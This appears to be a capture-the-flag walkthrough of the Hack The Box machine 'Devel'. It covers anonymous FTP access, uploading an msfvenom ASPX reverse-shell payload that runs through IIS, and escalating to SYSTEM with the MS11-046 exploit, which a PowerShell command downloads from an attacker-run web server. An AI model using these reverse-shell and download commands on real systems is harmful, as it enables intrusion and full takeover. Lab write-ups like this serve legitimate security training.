The Devel machine is a deliberately vulnerable machine with a Windows operating system found among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of the port scan, it was found that ports 21/tcp ftp Microsoft ftpd and 80/tcp http Microsoft IIS httpd 7.5 were open.
As a result of the nmap scan, we saw that we can log in with anonymous on the ftp port.
We logged in with anonymous:anonymous credential information.

(here different users have added their own shel as they have solved the machine)

Here we see welcome.png and aspnet_client directories in the ftp file.
Let’s go to welcome.png and take a look.

While scanning in Gobuster, we detected the /aspnet_client directory.

We’ve definitely figured out that he’s getting it from ftp. Let’s try to put the file in ftp with put and go.

Let’s go to this directory.

When we go to the directory, we see the note we wrote in it, let’s try to load and run our shell here.

We create the payload using msfvenom
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST= LPORT=4747 -o maygun.aspx

We uploaded our aspx file to ftp server

We are running our payload, let’s trigger it via broser

That’s how we got our shell
We have limited authorization on this shell

We use the systeminfo command to get information about the system.

Windows 7 Enterprise Build 7600 os system is used, let’s see if there is a vulnerability related to this.

We found local privilege escalation vulnerabilities

Let’s download it from searchsploit here

Here we can see the compilation from the descriptions in the exploit.
Here we have set up a web server with python and then from a Windows machine

powershell -c “(new-object System.Net.WebClient).DownloadFile(‘’, ‘c:\Users\Public\Downloads\MS11-046.exe’)”
We have executed the command

We ran MS11-046.exe where we obtained the nt authority\system user.

This way we got our user and root flags.


  1. Pingback: OSCP Prep – HTB all Windows Machine – Muhammed AYGÜN

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir